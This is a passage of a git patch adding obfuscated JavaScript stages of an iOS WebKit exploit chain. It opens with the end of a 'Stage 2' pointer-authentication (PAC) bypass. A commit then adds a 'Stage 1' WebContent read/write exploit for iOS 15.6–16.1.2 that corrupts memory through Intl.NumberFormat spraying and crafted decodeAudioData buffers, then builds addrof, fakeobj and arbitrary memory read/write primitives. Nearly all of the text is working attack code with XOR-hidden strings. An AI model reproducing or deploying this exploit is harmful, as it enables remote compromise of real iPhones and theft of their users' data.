1384128482, 3592358015], "__AUTH_CONST"); + let M = null; + window.log(`[Stage 2] IOKit first entry`); + + if (P.cr().qh("__AUTH_CONST", ((c, o) => { + if (32 === o) { + const o = c - 244; + if (o % 8 != 0 || s.read32(o + 4) >= 128 || s.read32(o + 12) >= 128) return !1; + const i = s.readRawBigInt(o), + t = s.readRawBigInt(o + 8); + return 0 !== i && 0 !== t && ("CallbackObject" === s.readString(i) && (M = o, !0)) + } + return !1 + })), null === M) throw new Error(""); + const G = function(c) { + let o; + window.log(`[Stage 2] __DATA_DIRTY __dyld4`); + + if (o = c._h("__DATA_DIRTY", "__dyld4"), null === o) throw new Error(""); + return P.platformState.exploitPrimitive.readRawBigInt(o.qe) + }(l), + k = function(c) { + const o = P.platformState.exploitPrimitive.readDoubleAsPointer(c), + i = P.platformState.exploitPrimitive.readDoubleAsPointer(o); + let t = i - i % 4096; + for (; 4277009103 !== P.platformState.exploitPrimitive.read32(t);) t -= 4096; + return cc.Xo(x.Vt.ut(t)) + }(G), + D = function(c) { + let o = null; + window.log(`[Stage 2] c.ar().qh("__TEXT")`); + + if (c.ar().qh("__TEXT", ((c, i) => 3670081792 === i && 3596551104 === s.read32(c + 4) && (o = c, !0))), null === o) throw new Error(""); + return o + }(k), + w = D + 8; + if (3670083840 !== s.read32(w) || 3596551104 !== s.read32(w + 4)) throw new Error("1"); + const Z = D + 16; + if (3670082816 !== s.read32(Z) || 3596551104 !== s.read32(Z + 4)) throw new Error("2"); + const S = D + 24; + if ((4294967296 + (1348958007 ^ -1968801225)) !== s.read32(S) || (4294967296 + (1651781976 ^ -1272237416)) !== s.read32(S + 4)) throw new Error("3"); + window.log(`[Stage 2] this.Za Lg4V8D platformFlags`); + this.Za = null, !0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.Lg4V8D && (this.Za = P.cr().fh("g_config")); + window.log(`[Stage 2] Lg4V8D g_config`); + + const A = { + Na: 0, + Fr: 1, + Lr: 2, + Rr: 3, + qr: 4, + za: 5, + Ha: 6, + Qa: 7, + Va: 8, + Wa: 9 + }, + N = { + Ra: 0 + }, + z = s.addrof(A), + f = (c => { + if (!0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.QwxZcT) { + const o = BigInt(s.read32(c)) & BigInt(4294967294); + return x.K(o * BigInt(16)) + } + if (!0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.juV600) { + if (null === this.Za) throw new Error(""); + const o = s.read32(c) >> 5 & 67108863, + i = 0 == (8 & c) ? s.readRawBigInt(c - c % 16384 + 16088) : s.readRawBigInt(c - 16), + t = s.readRawBigInt(i + globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.MhLcu0); + return s.readDoubleAsPointer(t + 8 * o) + } + if (!0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.ptTH_q) { + if (null === this.Za) throw new Error(""); + const o = s.read32(c) & globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.RNiPoX; + return P.platformState.exploitPrimitive.readRawBigInt(this.Za + globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.kEXt5Z) + o + } { + const o = s.read32(c) >> globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.rD3mNF & (1698986103 ^ 1706788744), + i = 0 == (8 & c) ? s.readRawBigInt(c - c % 16384 + 16088) : s.readRawBigInt(c - 16), + t = s.readRawBigInt(i + globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.MhLcu0); + return s.readDoubleAsPointer(t + 8 * o) + } + })(z), + H = n(256); + window.log("[Stage 2] versionFlags passed ok"); + for (let c = 24; c < 112; c += 8) s.writeInt64ToOffset(H + c, y); + s.writeInt64ToOffset(H + 96, h.yc); + const Q = n(24); + s.copyBigInt(Q + 8, H); + const V = n(24), + W = n(56), + R = n(56); + s.writeInt64ToOffset(R + 40, m.yc), s.copyBigInt(R + 32, V), s.copyBigInt(R + 48, W); + const O = x.Vt.ut(Q), + Y = x.Vt.ut(R); + !0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.QwxZcT && (M = x.K(x.O(M) / BigInt(16))); + window.log("[Stage 2] versionFlags.QwxZcT &&"); + + const U = function(i, t, a) { + s.writeInt64ToOffset(W + 40, i), s.writeInt64ToOffset(W + 32, t), s.writeInt64ToOffset(W + 48, a); + const l = s.read32(f + o); + let b = 0; + try { + s.write32(f + o, 1 | l), s.withTempOverrides((() => { + new Function("a", "b", "var ct" + (b) + " = a instanceof b ? " + (b + 1) + " : 12; return ct" + (b) + ";")(N, A) + }), { + Ir: f + c, + Zt: x.Vt.ut(M) + }, { + Ir: z + 16, + Zt: O + }, { + Ir: z + 32, + Zt: X.yc + }, { + Ir: z + 8, + Zt: Y + }, { + Ir: L, + Zt: X.yc + }, { + Ir: p, + Zt: y + }) + } finally { + s.write32(f + o, l), b += 1 + } + return s.readInt64FromOffset(V + 16) + }, + E = n(80), + J = n(56), + v = x.Vt.ut(E); + window.log("[Stage 2] weird expressions passed"); + s.copyBigInt(E + 72, J); + const F = function(c, o, i, t) { + return s.writeInt64ToOffset(J + 8, o), s.writeInt64ToOffset(J + 16, c), s.writeInt64ToOffset(J + 48, t), U(K.yc, v, i) + }, + j = U(g, new x.Vt((4294967296 + (2051826740 ^ -2051826742)), (4294967296 + (808676710 ^ -808676711))), x.Vt.ut(function(c) { + const o = new Uint8Array(c.length + 1); + for (let i = 0; i < c.length; i++) o[i] = c.charCodeAt(i); + const i = s.fakeobj(o); + return u[i] = o, i + }(([21, 8, 10, 23, 12, 29, 27, 12].map(x => { + return String.fromCharCode(x ^ 120); + }).join(""))))), + B = G + i, + _ = B - B % (2037926227 ^ 2037909843); + if (0 !== F(j, x.Vt.ut(_), x.Vt.ut((826882385 ^ 826898769)), x.Vt.ut(3)).Pt()) throw new Error(""); + const q = (() => { + const c = this.Mc(), + o = P.platformState.exploitPrimitive.fakeobj(c), + l = x.Vt.ut(o), + b = new Uint8Array(c.buffer), + I = 304, + d = 127; + c[34] = 0, c[35] = 0, c[36] = 0, c[37] = 1; + let y = 307; + for (let c = 0; c < "a".length; c++) b[y++] = "a".charCodeAt(c); + b[y++] = 0, b[y++] = d, b[431] = 3, b[432] = 0; + const r = n(512); + s.write32(r, 1936733284), s.write32(r + 8, 512); + const C = r + 16; + s.write32(C, 1815378276), s.copyBigInt(C + 8, o), s.write32(C + t, I), s.write32(C + a, 2048); + const e = x.Vt.ut(r), + u = x.Vt.ut(o + I + 3); + let h = x.Vt.ut(2 * C); + if (!0 === globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0").platformState.versionFlags.QwxZcT) { + const c = x.Vt.ut(k.ar().wh); + h = x.Vt.ut(C).vt(c) + } + return function(c) { + const o = x.Vt.ut(c).sub(l); + window.log("[Stage 2] before call to Xt"); + window.log(`[Stage 2] o: ${o} c: ${c}`); + x.Xt(b, 433, o); + window.log("[Stage 2] after call to Xt"); + let t = null; + if (s.withTempOverrides((() => { + t = U(g, h, u) + }), { + Ir: G + i, + Zt: e + }), t.Dt().yt() !== c) throw new Error(""); + return t + } + })(); + window.log("[Stage 2] before crash"); + this.La = q(D), this.Ga = q(w), this.Xa = q(Z), this.Ma = q(S); + window.log("[Stage 2] after crash"); + + const $ = n(24); + window.log("[Stage 2] near ...s.withTempOverrides..."); + + this.tc = U, this.ic = F, this.Ka = function(c, o, i) { + return s.writeInt64ToOffset($ + 16, c), s.writeInt64ToOffset($ + 0, o), U(T.yc, i, x.Vt.ut($)) + } + window.log("[Stage 2] PAC bypass - Stage2_15.0_16.2_breezy15 finished!"); + window.log("[Stage 2] PAC bypass OK!"); + } +} +return r.ga = function() { + + return new oc +}, r; \ No newline at end of file From da6717d27b4b881de5545e7e40ac4ec543122087 Mon Sep 17 00:00:00 2001 From: ghh-jb Date: Mon, 6 Apr 2026 22:19:26 +0300 Subject: [PATCH 4/5] Add support for bluebird WebContent r/w exploit on iOS 15.6-16.1.2. Tested on iPhone SE 2016 iOS 15.8.4, the chain is fully functional. --- Stage1_15.6_16.1.2_bluebird.js | 1407 ++++++++++++++++++++++++++++++++ 1 file changed, 1407 insertions(+) create mode 100755 Stage1_15.6_16.1.2_bluebird.js diff --git a/Stage1_15.6_16.1.2_bluebird.js b/Stage1_15.6_16.1.2_bluebird.js new file mode 100755 index 0000000..6fbe790 --- /dev/null +++ b/Stage1_15.6_16.1.2_bluebird.js @@ -0,0 +1,1407 @@ +let r = {}; +window.log("[Stage 1]"); +const x = globalThis.moduleManager.getModuleByName(([88, 90, 91, 95, 93, 95, 93, 91, 9, 91, 95, 93, 90, 84, 15, 12, 12, 9, 93, 8, 88, 90, 8, 91, 9, 84, 8, 14, 84, 94, 92, 95, 93, 14, 93, 11, 88, 95, 89, 90].map(x => { + return String.fromCharCode(x ^ 109); +}).join(""))), + { + N: G, + Vt: m, + v: o + } = globalThis.moduleManager.getModuleByName(([120, 122, 123, 127, 125, 127, 125, 123, 41, 123, 127, 125, 122, 116, 47, 44, 44, 41, 125, 40, 120, 122, 40, 123, 41, 116, 40, 46, 116, 126, 124, 127, 125, 46, 125, 43, 120, 127, 121, 122].map(x => { + return String.fromCharCode(x ^ 77); + }).join(""))), + P = globalThis.moduleManager.getModuleByName(([69, 64, 66, 66, 77, 23, 21, 71, 22, 69, 65, 69, 77, 22, 21, 70, 21, 76, 18, 64, 68, 22, 17, 70, 76, 67, 18, 66, 64, 66, 16, 64, 16, 67, 65, 77, 71, 17, 22, 68].map(x => { + return String.fromCharCode(x ^ 116); + }).join(""))); +class k { + constructor(t) { + window.log(`[Stage 1] k class constructor called`); + this.Bi = t, this._r = { + a: !1 + }, this.Wr = 0, this.yr = !1 + } + hr(t, i, n = 0) { + + let r = ""; + for (let s = 0; s < i; s += 8) { + const i = this.br(t + s + n), + a = this.br(t + s + n + 4); + r += (G(t + s)) + ([71].map(x => { + return String.fromCharCode(x ^ 111) + }).join("")) + (G(s)) + ([71, 84, 78].map(x => { + return String.fromCharCode(x ^ 110) + }).join("")) + (e = i, o = a, ([87, 31].map(x => { + return String.fromCharCode(x ^ 103) + }).join("")) + (o.toString(16)) + ([121, 121, 121, 121, 121, 121, 121, 121].map(x => { + return String.fromCharCode(x ^ 73) + }).join("")) + (e.toString(16)).slice(-8)) + ([70].map(x => { + return String.fromCharCode(x ^ 76) + }).join("")) + } + var e, o + } + wr(t, i, n) { + for (let r = 0; r < n; r += 4) this.dr(t + r, i) + } + gr(t, i, n) { + if (n % 4 != 0) throw new Error(""); + this.yr = !0; + for (let r = 0; r < n; r += 4) this.dr(t.H(r).W(), this.br(i.H(r).W())); + this.yr = !1 + } + ir(t) { + // window.log(`[Stage 1] k.ir() - reading 32-bit from Int64`); + this.yr = !0; + const i = this.br(t.W()); + return this.yr = !1, i + } + Ur(t) { + // window.log(`[Stage 1] k.Ur() - reading Int64 from Int64`); + this.yr = !0; + const i = this.br(t.W()), + n = this.br(t.H(4).W()); + return this.yr = !1, new m(i, n) + } + mr(t) { + // window.log(`[Stage 1] k.mr() - reading double as pointer`); + this.yr = !0; + const i = this.br(t.W()), + n = this.br(t.H(4).W()); + return this.yr = !1, x.T(i, n) + } + Ar(t) { + const i = t.it % 4; + t = t.Bt(i), this.yr = !0; + const n = this.br(t.W()) >> 8 * i & (1464496978 ^ 1464497069); + return this.yr = !1, n + } + Tr(t, i = (762274105 ^ 762273849)) { + let n = ""; + for (; n.length < i;) { + const i = this.Ar(t.H(n.length)); + if (0 === i) break; + n += String.fromCharCode(i) + } + return n + } + Pr(t, i) { + let n = ""; + for (; n.length < i;) { + const i = this.Ar(t.H(n.length)); + n += String.fromCharCode(i) + } + return n + } + br(t) { + return -1 + } + Jr(t, i) { } + write32x2(t, i, n) { + this.dr(t, i), this.dr(t + 4, n) + } + ti(t, i) { } + dr(t, i) { } + Sr(t) { + const i = t % 4; + let n; + return n = !0 === this.yr ? x.q(t, -i) : t - i, this.br(n) >> 8 * i & (1198608761 ^ 1198608774) + } + nr(t) { + const i = this.br(t), + n = this.br(t + 4); + if (n > o) throw new Error(""); + return x.T(i, n) + } + Dr(t, i = !1) { + const n = this.br(t); + let r = this.br(t + 4); + return (!0 === i || P.zn.versionFlags.zohDDd) && (r &= o), x.T(n, r) + } + readInt64FromOffset(t) { + window.log(`[Stage 1] k.readInt64FromOffset(${t})`); + const i = this.br(t), + n = this.br(t + 4); + return new m(i, n) + } + Er(t, i = (1665348973 ^ 1665348717)) { + let n = (812406617 ^ 1335077030); + ([88, 67, 91, 84, 83, 68].map(x => { + return String.fromCharCode(x ^ 54); + }).join("")) == typeof i && (n = i); + let r = ""; + for (; r.length < n;) { + const i = this.Sr(t + r.length); + if (0 === i) break; + r += String.fromCharCode(i) + } + return r + } + Nr(t, i) { + let n = ""; + for (; n.length < i;) { + const i = this.Sr(t + n.length); + n += String.fromCharCode(i) + } + return n + } + tr(t) { + // window.log(`[Stage 1] k.tr() - addrof primitive called`); + this._r.a = t; + const i = this.nr(this.Wr); + return this._r.a = null, i + } + zr() { } + cleanup() { window.log(`[Stage 1] k.cleanup() called`), this.zr() } + pr(t) { + // window.log(`[Stage 1] k.pr() - fakeobj from string`); + const i = new DataView(new ArrayBuffer(t.length + 1)); + x.D(i); + for (let n = 0; n < t.length; n++) i.setUint8(n, t.charCodeAt(n)); + return this.Mr(i) + } + Or(t, i = !1) { + // window.log(`[Stage 1] k.Or() - allocControlledBuffer size=${t}, i=${i}`); + const n = new ArrayBuffer(t), + r = new Uint8Array(n); + x.D(n); + const e = this.tr(r), + o = this.Dr(e + P.zn.versionFlags.oGn3OG); + if (window.log(`[Stage 1] k.Or() - backing store at ${x.N(o)}`), !0 === i) { + const t = this.tr(n), + i = this.Dr(t + P.zn.versionFlags.CN3rr_); + let r = this.br(i + P.zn.versionFlags.EMDU4o); + r += 32, this.dr(i + P.zn.versionFlags.EMDU4o, r) + } + return o + } + Mr(t, i = !1) { + // window.log(`[Stage 1] k.Mr() - fakeobj called`); + t instanceof ArrayBuffer && (t = new Int8Array(t)); + const n = this.tr(t); + return window.log(`[Stage 1] k.Mr() - addrof result: ${x.N(n)}`), this.Dr(n + P.zn.versionFlags.oGn3OG, i) + } + Br(t, ...i) { + // window.log(`[Stage 1] k.Br() - withTempOverrides called, ${i.length} overrides`); + const n = new Array(i.length + 10); + for (let t = 0; t < i.length; t++) n[t] = this.readInt64FromOffset(i[t].Ir); + try { + for (let t = 0; t < i.length; t++) this.Jr(i[t].Ir, i[t].Zt); + t() + } finally { + for (let t = 0; t < i.length; t++) this.Jr(i[t].Ir, n[t]) + } + } +} +class z extends k { + constructor(t, i) { + window.log(`[Stage 1] z class constructor called - setting up exploit primitive wrapper`); + super(t), this.Ii = i, this.Wr = x.K(this.Ii.tA(this._r)) + P.zn.versionFlags.fGOrHX; + window.log(`[Stage 1] z class - Wr set to: ${x.N(this.Wr)}`) + } + _i(t) { + return !0 === this.yr ? x.X(t) : x.O(t) + } + br(t) { + return this.Ii.br(this._i(t)) + } + dr(t, i) { + this.Ii.dr(this._i(t), i) + } + ti(t, i) { + this.Ii.dr(this._i(t), i >>> 0), this.Ii.dr(this._i(t) + BigInt(4), i / 4294967296 >>> 0) + } + Jr(t, i) { + this.Ii.dr(this._i(t), i.it), this.Ii.dr(this._i(t) + BigInt(4), i.et) + } + write32x2(t, i, n) { + this.Ii.dr(this._i(t), i), this.Ii.dr(this._i(t) + BigInt(4), n) + } + read32(t) { + return this.br(t) + } + read32FromInt64(t) { + return this.ir(t) + } + readInt64FromInt64(t) { + return this.Ur(t) + } + readStringFromInt64(t, i) { + return this.Tr(t, i) + } + readByte(t) { + return this.Ar(t) + } + readRawBigInt(t) { + return this.nr(t) + } + readDoubleAsPointer(t, i) { + return this.Dr(t, i) + } + readString(t, i) { + return this.Er(t, i) + } + fakeobj(t, i) { + return this.Mr(t, i) + } + addrof(t) { + return this.tr(t) + } + write32(t, i) { + return this.dr(t, i) + } + writeInt64ToOffset(t, i) { + return this.Jr(t, i) + } + copyBigInt(t, i) { + return this.ti(t, i) + } + withTempOverrides(t, ...i) { + return this.Br(t, ...i) + } +} +class C { + constructor() { + this.rn = new ArrayBuffer(16), this.en = new DataView(this.rn) + } + un(t) { + return this.en.setInt16(0, t, !0), this.en.getInt16(0, !0) + } + on(t) { + return this.en.setUint16(0, t, !0), this.en.getUint16(0, !0) + } + sn(t) { + return this.en.setUint32(0, t, !0), this.en.getUint32(0, !0) + } + hn(t, i) { + return this.en.setFloat64(0, t, !0), this.en.setUint32(0, i, !0), this.en.getFloat64(0, !0) + } + cn(t, i) { + return this.en.setFloat64(0, t, !0), this.en.setUint32(4, i, !0), this.en.getFloat64(0, !0) + } + fn(t) { + for (let i = 0; i < 4; i++) { + const n = t.charCodeAt(i); + if (Number.isNaN(n)) throw new Error(""); + this.en.setUint16(2 * i, n, !0) + } + return this.en.getBigUint64(0, !0) + } + an(t) { + return this.en.setFloat32(0, t, !0), this.en.getUint32(0, !0) + } + wn(t) { + return this.en.setBigUint64(0, t, !0), this.en.getFloat64(0, !0) + } + gn(t, i) { + return this.en.setBigUint64(0, t, !0), this.en.setUint8(0, Number(i)), this.en.getBigUint64(0, !0) + } + ln(t, i) { + return this.en.setBigUint64(0, t, !0), this.en.setUint32(0, Number(i), !0), this.en.getBigUint64(0, !0) + } + bn(t, i) { + return this.en.setUint32(0, t, !0), this.en.setUint8(0, Number(i)), this.en.getUint32(0, !0) + } + Un(t, i) { + return this.en.setUint32(0, t, !0), this.en.setUint32(0, Number(i), !0), this.en.getUint32(0, !0) + } + mn(t, i) { + return this.en.setBigUint64(0, t, !0), this.en.setUint32(0, Number(i), !0), this.en.getBigUint64(0, !0) + } + ki(t) { + return this.en.setBigInt64(0, t, !0), this.en.getBigUint64(0, !0) + } +} +class M { + constructor(t, i, n, r, e, o, s, a) { + window.log(`[Stage 1] M class constructor - corrupted Intl.NumberFormat primitive`); + this.vi = t, this.Fi = i, this.Ni = n, this.zi = r, this.pi = e, this.Ci = o, this.xi = s, this.Mi = a, this.Oi = new C; + window.log(`[Stage 1] M class - vi=${x.N(t)}, Fi baseVal=${i.baseVal}, xi=${x.N(s)}`) + } + Wi(t) { + this.zi.baseVal = Number(t >> BigInt(32)), this.Fi.baseVal = Number(t - BigInt(28) & BigInt(([1, 73, 119, 119, 119, 119, 119, 119, 119, 119].map(x => { + return String.fromCharCode(x ^ 49); + }).join("")))) + } + Vi(t) { + this.Oi.en.setUint32(0, Number(t), !0), this.Ci.baseVal = this.Oi.en.getUint32(0, !0) + } + $i() { + return this.Oi.en.setUint32(0, this.Ci.baseVal, !0), this.Oi.en.getUint32(0, !0) + } + dr(t, i) { + this.Wi(t), this.Vi(i) + } + Hi(t, i) { + this.Wi(t), this.Vi(i & BigInt(([83, 27, 37, 37, 37, 37, 37, 37, 37, 37].map(x => { + return String.fromCharCode(x ^ 99); + }).join("")))), this.Wi(t + BigInt(4)), this.Vi(i >> BigInt(32)) + } + Er(t, i = (1983998776 ^ 1983998008)) { + let n = ""; + for (let r = 0; r < i; r++) { + const i = this.Sr(t + BigInt(r)); + if (0 === i) break; + n += String.fromCharCode(i) + } + return n + } + br(t) { + return this.Wi(t), this.$i() + } + ji(t) { + return (1112564076 ^ 1112579731) & this.br(t) + } + Sr(t) { + return (2016893289 ^ 2016893334) & this.br(t) + } + Ki(t) { + const i = this.br(t), + n = this.br(t + BigInt(4)); + return BigInt(n) << BigInt(32) | BigInt(i) + } + tA(t) { + window.log(`[Stage 1] M.tA() - address-of primitive called for object`); + this.Mi[0] = t; + const i = this.Ki(this.xi + BigInt(8)), + n = this.Ki(i); + return window.log(`[Stage 1] M.tA() - returning address: ${x.N(Number(n))}`), this.Mi[0] = null, n + } +} +return r.si = async function (t) { + window.log(`[Stage 1] === r.si entry point called - starting exploit ===`); + const i = BigInt(([74, 2, 77, 60, 60, 60, 60, 60, 60, 60, 60, 60].map(x => { + return String.fromCharCode(x ^ 122); + }).join(""))); + + function n(t) { + return t & i + } + try { + window.log(`[Stage 1] Starting main exploit IIFE`); + const i = await async function () { + window.log(`[Stage 1] Inside exploit IIFE`); + const i = { + Ji: null, + Li: null + }, + r = new OfflineAudioContext(2, (1261462879 ^ 1261488411), (1832209514 ^ 1832247342)), + e = r.decodeAudioData.bind(r), + o = []; + r.decodeAudioData = async t => { + const i = await e(t); + return o.push(i), null + }; + const s = (1331970635 ^ 1331976467); + + function a() { + let t = 0; + for (let i = 0; i < s; i++) try { + new Intl.NumberFormat(([46, 37, 61, 37, 41, 32, 44, 32, 59, 17].map(x => { + return String.fromCharCode(x ^ 74); + }).join("")), {}) + } catch (i) { + t += 1 + } + if (t !== s) throw new Error("") + } + + function c() { + for (let t = 0; t < (1750692460 ^ 1750692508); t++) new ArrayBuffer((1447127853 ^ 1442933549)) + } + async function h(t, i) { + try { + window.log(`[Stage 1] h() - starting corruption at array index ${i}`); + const n = S(k, new T); + window.log(`[Stage 1] h() - S(k, new T) returned buffer size: ${n.byteLength}`); + const e = p(new ArrayBuffer((1397113677 ^ 1397097293)), (825849196 ^ 825851436), (946692948 ^ 946696852)); + window.log(`[Stage 1] h() - S() and p() completed`); + const o = [], + h2 = [], + l2 = []; + for (let n = 0; n < s; n++) t[i + n] = new Intl.NumberFormat(([53, 62, 125, 5, 3].map(x => { + return String.fromCharCode(x ^ 80); + }).join("")), {}), o[n] = [new Intl.NumberFormat(([51, 56, 123, 3, 5].map(x => { + return String.fromCharCode(x ^ 86); + }).join("")), {}), new Intl.NumberFormat(([40, 35, 96, 24, 30].map(x => { + return String.fromCharCode(x ^ 77); + }).join("")), {}), new Intl.NumberFormat(([39, 44, 111, 23, 17].map(x => { + return String.fromCharCode(x ^ 66); + }).join("")), {})], h2.push([new Intl.NumberFormat(([46, 37, 102, 30, 24].map(x => { + return String.fromCharCode(x ^ 75); + }).join("")), {}), new Intl.NumberFormat(([54, 61, 126, 6, 0].map(x => { + return String.fromCharCode(x ^ 83); + }).join("")), {})]); + window.log(`[Stage 1] h() - Intl.NumberFormat spray done, calling c() and a()`); + h2.length = 0, c(), a(); + for (let n = 0; n < s; n++) t[i + n].format(1), t[i + n].format(2), t[i + n].format(3); + window.log(`[Stage 1] h() - format calls done, calling c() and a() again`); + o.length = 0, c(), a(); + window.log(`[Stage 1] h() - starting decodeAudioData loop (20 iterations)`); + for (let t2 = 0; t2 < 20; t2++) { + try { await r.decodeAudioData(e); } catch (t3) { window.log(`[Stage 1] h() - decodeAudioData(e) iter ${t2} error: ${t3.message}`); } + try { await r.decodeAudioData(e); } catch (t3) { window.log(`[Stage 1] h() - decodeAudioData(e) iter ${t2} error: ${t3.message}`); } + try { + await r.decodeAudioData(n) + } catch (t2) { } + if (t2 % 5 === 4) window.log(`[Stage 1] h() - decodeAudioData loop iteration ${t2 + 1}/20 done`); + } + window.log(`[Stage 1] h() - decodeAudioData loop done, searching for corruption`); + for (let n2 = i; n2 < t.length; n2++) { + const i2 = t[n2]; + if (null === i2) continue; + const r2 = i2.format(1.02); + if (4 !== r2.length) { + window.log(`[Stage 1] h() - found corrupted Intl.NumberFormat at index ${n2}, result string length: ${r2.length}`); + let n3 = BigInt(r2.charCodeAt(19)); + return n3 = n3 << BigInt(16) | BigInt(r2.charCodeAt(18)), n3 = n3 << BigInt(16) | BigInt(r2.charCodeAt(17)), n3 -= BigInt((2052666958 ^ 2052667254)), window.log(`[Stage 1] h() - extracted address: ${x.N(Number(n3))}`), { + Ri: [...t, ...o, ...h2, ...l2], + Xi: i2, + qi: n3 + } + } + } + window.log(`[Stage 1] h() - NO corruption found, scanned ${t.length - i} entries`); + throw new Error("h(): no corruption found") + } catch (err) { + window.log(`[Stage 1] h() - EXCEPTION: ${err.message || err}`); + throw err; + } + } + const l = (1598836557 ^ 1598852957), + f = 1, + w = 2, + u = 3, + g = 5, + d = 6, + b = 10, + B = (1248819300 ^ 503254354), + I = BigInt((1329753424 ^ 1329753816)), + _ = BigInt((808924234 ^ 808925058)), + m = BigInt(8), + y = BigInt(12), + U = BigInt(10), + E = BigInt(24), + k = new ArrayBuffer((1496413524 ^ 1496397140)), + v = new C; + class F { + Gi(t) { + if (t !== this.Qi.length) throw new Error("") + } + Yi(t) { + if (0 === t.length) return 0; + if (this.Zi + t.length >= this.Qi.length && (this.Gi(this.Zi + t.length + 1), this.Zi + t.length >= this.Qi.length)) throw new Error(""); + return this.Qi.set(t, this.Zi), this.Zi += t.length, t.length + } + te(t) { + if (this.Zi < 0) throw new Error(""); + if (this.Zi > this.Qi.length) throw new Error(""); + this.Zi = t + } + ie() { + this.Zi = 0 + } + ne() { + return this.Qi.length + } + re() { + return this.Zi + } + ee() { + return this.Qi.subarray() + } + constructor(t) { + this.Qi = new Uint8Array(t), this.Zi = 0, this.oe = new ArrayBuffer(32), this.se = new Uint8Array(this.oe), this.ae = new DataView(this.oe) + } + ce(t) { + this.ae.setUint32(0, t, !1), this.Yi(this.se.subarray(0, 4)) + } + he(t) { + this.ae.setUint16(0, t, !1), this.Yi(this.se.subarray(0, 2)) + } + le(t, i) { + const n = new Uint8Array(i); + n.fill(t), this.Yi(n) + } + fe(t) { + this.Yi(new Uint8Array([t])) + } + we(t) { + let i = 0; + for (; i < t.length;) { + const n = t.charCodeAt(i); + if (0 != ((1131695413 ^ 1131721269) & n)) throw new Error(""); + this.fe(n), i++ + } + } + ue(t) { + this.te(t) + } + ge() { + this.ie() + } + de() { + return this.ne() + } + be() { + return this.re() + } + Be() { + return this.ee() + } + } + class N { + Ie(t) { } + _e(t) { } + } + + function S(t, i) { + const n = new F(t), + r = [{ + tag: f, + me: void 0, + ye: void 0 + }, { + tag: u, + me: void 0, + ye: void 0 + }, { + tag: g, + me: void 0, + ye: void 0 + }, { + tag: d, + me: void 0, + ye: void 0 + }, { + tag: b, + me: void 0, + ye: void 0 + }], + e = 16 + 12 * r.length; + n.ue(e); + for (const t of r) { + const r = n.be(); + switch (t.me = r, t.tag) { + case f: { + const t = { + Ue: 0, + Ee: 0, + ke: B, + ve: 0, + Fe: 0, + Ne: 0, + Se: 0 + }; + n.he(t.Ue), n.he(t.Ee), n.ce(t.ke), n.ce(t.ve), n.ce(t.Fe), n.ce(t.Ne), n.ce(t.Se); + break + } + case u: + n.he(0), n.le("\0", 16), n.le("\0", 40), n.ce(0), n.ce(0), n.ce(0), n.ce(0); + break; + case g: + n.ce(0); + break; + case d: + i.Ie(n); + break; + case b: + i._e(n) + } + t.ye = n.be() - r + } + const o = n.be(); + n.ue(0), n.ce(o), n.ce(B), n.ce(r.length), n.ce(0); + for (const t of r) n.ce(t.tag), n.ce(t.me), n.ce(t.ye); + return n.Be().buffer.slice(0, o) + } + class A extends N { + constructor(t, i) { + super(), this.Ae = t, this.Te = i + } + Ie(t) { + const i = [], + n = (1245868108 ^ 1245856356); + if (this.Ae < BigInt(4294967296)) throw new Error(""); + let r = Number((this.Ae >> BigInt(32)).toString()); + v.on(r) % 2 == 0 && (r += 1); + let e = v.un(-(1346467123 ^ 1346453811)); + e -= 16 * r; + let o = v.un(24 * r + 72); + if (v.on(o) % 16 != 0) throw new Error(""); + o += 16, e += o; + const s = Math.floor(e / 16), + a = v.un(8 * s); + let c = this.Ae - BigInt(a.toString()); + c -= BigInt(v.on(8 * r).toString()); + const h = (t, i) => t <= i ? t : i, + f = (t, i) => Number(BigInt.asUintN(t, i).toString()), + w = h(BigInt((4294967296 + (1364288331 ^ -1364288332))), c); + i.push({ + ze: 0, + pe: f(32, w), + Ce: l + }), c -= w; + let u = r; + for (; u > 0;) + if (u -= 1, c !== BigInt(0)) { + const t = h(BigInt((4294967296 + (1833069881 ^ -1833069882))), c); + i.push({ + ze: 1, + pe: f(32, t), + Ce: l + }), c -= t + } else i.push({ + ze: 1, + pe: 0, + Ce: l + }); + i.push({ + ze: v.on(s), + pe: 0, + Ce: l + }), i.push({ + ze: 1, + pe: 0, + Ce: l + }), i.push({ + ze: 12, + pe: 0, + Ce: l + }); + let g = 0; + for (const t of i) g += v.un(t.ze); + let d = 0; + if (g < 0) d += -1 * g, d += (1131962233 ^ 1131961432); + else { + if (d > (1817196108 ^ 1817195885)) throw new Error(""); + d += (1732462198 ^ 1732461911) - d + } + if (i.push({ + ze: d, + pe: 0, + Ce: l + }), 24 * i.length > n) throw new Error(""); + for (; 24 * i.length !== n;) i.push({ + ze: 0, + pe: 0, + Ce: l + }); + t.ce(i.length); + for (const n of i) t.ce(n.ze), t.ce(0), t.ce(0), t.ce(n.pe), t.ce(0), t.he(n.Ce), t.ce(0) + } + _e(t) { + t.ce(this.Te[1]), t.ce(this.Te[0]) + } + } + class T extends N { + constructor() { + super() + } + Ie(t) { + const i = []; + let n = -(1281700471 ^ 1281695863); + n += (1848864878 ^ 1848866798), n = Math.floor(n / 16), i.push({ + ze: 0, + pe: 0, + Ce: l + }), i.push({ + ze: 0, + pe: 0, + Ce: l + }), i.push({ + ze: v.on(n), + pe: 0, + Ce: l + }), i.push({ + ze: 1, + pe: (4294967296 + (1731682929 ^ -1731682930)), + Ce: 0 + }); + const r = Math.floor(-(1937008452 ^ 1937008428)); + i.push({ + ze: v.on(r), + pe: (1882552910 ^ 1882556797), + Ce: 0 + }), i.push({ + ze: 2, + pe: 